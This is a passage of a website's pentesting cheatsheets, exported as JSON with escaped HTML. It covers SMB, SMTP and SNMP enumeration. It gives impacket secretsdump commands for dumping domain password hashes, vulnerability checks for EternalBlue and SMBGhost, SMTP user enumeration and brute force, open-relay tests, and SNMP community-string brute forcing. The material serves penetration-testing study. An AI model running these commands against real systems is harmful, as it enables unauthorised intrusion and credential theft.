\u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 rpcdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 lookupsid.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 secretsdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;      \u003cspan style=\"color:#75715e\"\u003e# Dump all hashes\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 secretsdump.py -just-dc-ntlm \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"mounting-smb-shares\"\u003eMounting SMB Shares\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Linux mount\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt;,password\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo 
mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt;,password\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;pass\u0026gt;,domain\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-vulnerabilities\"\u003eKey Vulnerabilities\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eCVE\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eName\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2017-0144\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eEternalBlue / MS17-010\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBv1 RCE — WannaCry / NotPetya\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2020-0796\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBGhost\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eSMBv3.1.1 compression RCE\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003eCVE-2021-34527\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrintNightmare\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePrint Spooler RCE via SMB\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# EternalBlue check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan 
style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-ms17-010 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smb/smb_ms17_010\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# SMBGhost check\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-cve2020-0796 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smb/cve_2020_0796_smbghost\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","title":"SMB"},{"content":"SMTP Enumeration Cheatsheet Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)\nBanner Grabbing nc -nv \u0026lt;ip\u0026gt; 25 telnet \u0026lt;ip\u0026gt; 25 openssl s_client -starttls smtp -connect \u0026lt;ip\u0026gt;:587 openssl s_client -connect \u0026lt;ip\u0026gt;:465 Manual SMTP Commands HELO \u0026lt;domain\u0026gt; # Basic hello EHLO \u0026lt;domain\u0026gt; # Extended hello (lists capabilities) AUTH LOGIN # Start base64 auth AUTH PLAIN # Plain auth VRFY \u0026lt;user\u0026gt; # Verify if user exists EXPN \u0026lt;list\u0026gt; # Expand mailing list members RCPT TO:\u0026lt;user@domain\u0026gt; # Verify recipient (within MAIL flow) MAIL FROM:\u0026lt;attacker@test.com\u0026gt; RCPT TO:\u0026lt;target@domain\u0026gt; DATA # Begin message body . 
# End message (single dot on its own line) RSET # Reset connection state QUIT Capabilities Enumeration # See what the server supports after EHLO nc \u0026lt;ip\u0026gt; 25 EHLO test.com # Common capabilities to note: # STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN User Enumeration # smtp-user-enum tool smtp-user-enum -M VRFY -U users.txt -t \u0026lt;ip\u0026gt; smtp-user-enum -M EXPN -U users.txt -t \u0026lt;ip\u0026gt; smtp-user-enum -M RCPT -U users.txt -t \u0026lt;ip\u0026gt; -D \u0026lt;domain\u0026gt; # Manual VRFY loop for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 \u0026lt;ip\u0026gt; 25 2\u0026gt;/dev/null | grep \u0026#34;^250\u0026#34; done # Response codes: # 250 = user exists # 252 = can\u0026#39;t verify but will attempt delivery # 550 = user does not exist Nmap Scripts nmap -p 25 --script smtp-commands \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-enum-users \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-open-relay \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-brute \u0026lt;ip\u0026gt; nmap -p 25 --script smtp-ntlm-info \u0026lt;ip\u0026gt; # Windows NTLM info leak nmap -p 25 --script smtp-vuln-cve2010-4344 \u0026lt;ip\u0026gt; # Exim heap overflow nmap -p 25,587,465 --script smtp-* \u0026lt;ip\u0026gt; Open Relay Testing nc \u0026lt;ip\u0026gt; 25 EHLO test.com MAIL FROM:\u0026lt;attacker@attacker.com\u0026gt; RCPT TO:\u0026lt;victim@external-domain.com\u0026gt; # If accepted = open relay! DATA Subject: relay test This is a test. . 
QUIT # Automated nmap -p 25 --script smtp-open-relay \\ --script-args smtp-open-relay.from=sender@test.com,smtp-open-relay.to=victim@gmail.com \u0026lt;ip\u0026gt; Metasploit use auxiliary/scanner/smtp/smtp_version use auxiliary/scanner/smtp/smtp_enum use auxiliary/scanner/smtp/smtp_relay NTLM Info Leak (Windows SMTP) # Triggers Windows SMTP servers to reveal hostname, domain, OS version nmap -p 25 --script smtp-ntlm-info \u0026lt;ip\u0026gt; # Manual nc \u0026lt;ip\u0026gt; 25 EHLO test AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Decode the Base64 response with ntlmdecoder or responder Useful Wordlists /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/smtp/","summary":"\u003ch1 id=\"smtp-enumeration-cheatsheet\"\u003eSMTP Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner-grabbing\"\u003eBanner Grabbing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003etelnet \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -starttls smtp -connect \u0026lt;ip\u0026gt;:587\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eopenssl s_client -connect 
\u0026lt;ip\u0026gt;:465\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"manual-smtp-commands\"\u003eManual SMTP Commands\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003eHELO \u0026lt;domain\u0026gt;                   # Basic hello\nEHLO \u0026lt;domain\u0026gt;                   # Extended hello (lists capabilities)\nAUTH LOGIN                      # Start base64 auth\nAUTH PLAIN                      # Plain auth\nVRFY \u0026lt;user\u0026gt;                     # Verify if user exists\nEXPN \u0026lt;list\u0026gt;                     # Expand mailing list members\nRCPT TO:\u0026lt;user@domain\u0026gt;           # Verify recipient (within MAIL flow)\nMAIL FROM:\u0026lt;attacker@test.com\u0026gt;\nRCPT TO:\u0026lt;target@domain\u0026gt;\nDATA                            # Begin message body\n.                               # End message (single dot on its own line)\nRSET                            # Reset connection state\nQUIT\n\u003c/code\u003e\u003c/pre\u003e\u003chr\u003e\n\u003ch2 id=\"capabilities-enumeration\"\u003eCapabilities Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# See what the server supports after EHLO\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO test.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Common capabilities to note:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-enumeration\"\u003eUser Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# smtp-user-enum tool\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M VRFY -U users.txt -t \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M EXPN -U users.txt -t \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmtp-user-enum -M RCPT -U users.txt -t \u0026lt;ip\u0026gt; -D \u0026lt;domain\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Manual VRFY loop\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003efor\u003c/span\u003e user in \u003cspan style=\"color:#66d9ef\"\u003e$(\u003c/span\u003ecat users.txt\u003cspan style=\"color:#66d9ef\"\u003e)\u003c/span\u003e; \u003cspan 
style=\"color:#66d9ef\"\u003edo\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  echo VRFY $user | nc -nv -w \u003cspan style=\"color:#ae81ff\"\u003e1\u003c/span\u003e \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e 2\u0026gt;/dev/null | grep \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;^250\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#66d9ef\"\u003edone\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Response codes:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 250 = user exists\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 252 = can\u0026#39;t verify but will attempt delivery\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# 550 = user does not exist\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"nmap-scripts\"\u003eNmap Scripts\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-commands \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-enum-users \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-open-relay \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-ntlm-info \u0026lt;ip\u0026gt;          \u003cspan style=\"color:#75715e\"\u003e# Windows NTLM info leak\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-vuln-cve2010-4344 \u0026lt;ip\u0026gt;  \u003cspan style=\"color:#75715e\"\u003e# Exim heap overflow\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 25,587,465 --script smtp-* \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"open-relay-testing\"\u003eOpen Relay Testing\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO 
test.com\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eMAIL FROM:\u0026lt;attacker@attacker.com\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eRCPT TO:\u0026lt;victim@external-domain.com\u0026gt;    \u003cspan style=\"color:#75715e\"\u003e# If accepted = open relay!\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eDATA\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eSubject: relay test\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eThis is a test.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e.\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eQUIT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Automated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-open-relay \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  --script-args smtp-open-relay.from\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003esender@test.com,smtp-open-relay.to\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003evictim@gmail.com \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"metasploit\"\u003eMetasploit\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" 
style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_version\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_enum\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/smtp/smtp_relay\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ntlm-info-leak-windows-smtp\"\u003eNTLM Info Leak (Windows SMTP)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Triggers Windows SMTP servers to reveal hostname, domain, OS version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e --script smtp-ntlm-info \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Manual\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eEHLO test\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eAUTH 
NTLM\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eTlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Decode the Base64 response with ntlmdecoder or responder\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"useful-wordlists\"\u003eUseful Wordlists\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e/usr/share/seclists/Usernames/top-usernames-shortlist.txt\n/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt\n\u003c/code\u003e\u003c/pre\u003e","title":"SMTP"},{"content":"SNMP Enumeration Cheatsheet Default Ports: 161 (UDP — queries), 162 (UDP — traps)\nSNMP Versions Version Auth Notes v1 Community string Cleartext, oldest v2c Community string Cleartext, most common v3 Username + auth + encryption Secure, rarely misconfigured Detection nmap -sU -p 161 \u0026lt;ip\u0026gt; nmap -sU -p 161 -sV \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-info \u0026lt;ip\u0026gt; Community String Brute Force # onesixtyone (fast UDP brute) onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt \u0026lt;ip\u0026gt; onesixtyone -c community.txt -i ips.txt # Nmap nmap -sU -p 161 --script snmp-brute \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-brute \\ --script-args snmp-brute.communitiesdb=communities.txt \u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/snmp/snmp_login set RHOSTS \u0026lt;ip\u0026gt; run snmpwalk — Walking the MIB Tree # Full walk (v1/v2c) snmpwalk -v1 -c public \u0026lt;ip\u0026gt; snmpwalk -v2c -c public \u0026lt;ip\u0026gt; # Target specific OIDs snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1 # System info snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.4.2 # Running 
processes snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.25.6.3 # Installed software snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.4.1.77.1.2.25 # Windows user accounts snmpwalk -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.2.2 # Network interfaces # SNMPv3 snmpwalk -v3 -u \u0026lt;user\u0026gt; -l AuthPriv \\ -a MD5 -A \u0026lt;authpass\u0026gt; -x DES -X \u0026lt;privpass\u0026gt; \u0026lt;ip\u0026gt; snmpget — Single OID Query snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.1.0 # sysDescr snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.5.0 # sysName (hostname) snmpget -v2c -c public \u0026lt;ip\u0026gt; 1.3.6.1.2.1.1.6.0 # sysLocation snmp-check snmp-check \u0026lt;ip\u0026gt; snmp-check \u0026lt;ip\u0026gt; -c public snmp-check \u0026lt;ip\u0026gt; -c public -v 2c braa — Bulk SNMP braa public@\u0026lt;ip\u0026gt;:.1.3.6.* braa public@192.168.1.1-254:.1.3.6.1.2.1.1.1.0 Nmap SNMP Scripts nmap -sU -p 161 --script snmp-info \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-sysdescr \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-interfaces \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-processes \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-users \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-services \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-win32-software \u0026lt;ip\u0026gt; nmap -sU -p 161 --script snmp-* \u0026lt;ip\u0026gt; Key OIDs Reference OID Description 1.3.6.1.2.1.1.1.0 System description 1.3.6.1.2.1.1.3.0 System uptime 1.3.6.1.2.1.1.5.0 Hostname 1.3.6.1.2.1.1.6.0 System location 1.3.6.1.2.1.25.1.6.0 Running OS processes 1.3.6.1.2.1.25.4.2.1.2 Process names 1.3.6.1.2.1.25.6.3.1.2 Installed packages 1.3.6.1.4.1.77.1.2.25 Windows user accounts 1.3.6.1.2.1.6.13.1.3 TCP open ports 1.3.6.1.2.1.2.2.1.2 Interface names 1.3.6.1.2.1.2.2.1.11 Interface in-packets Common Community Strings public private 
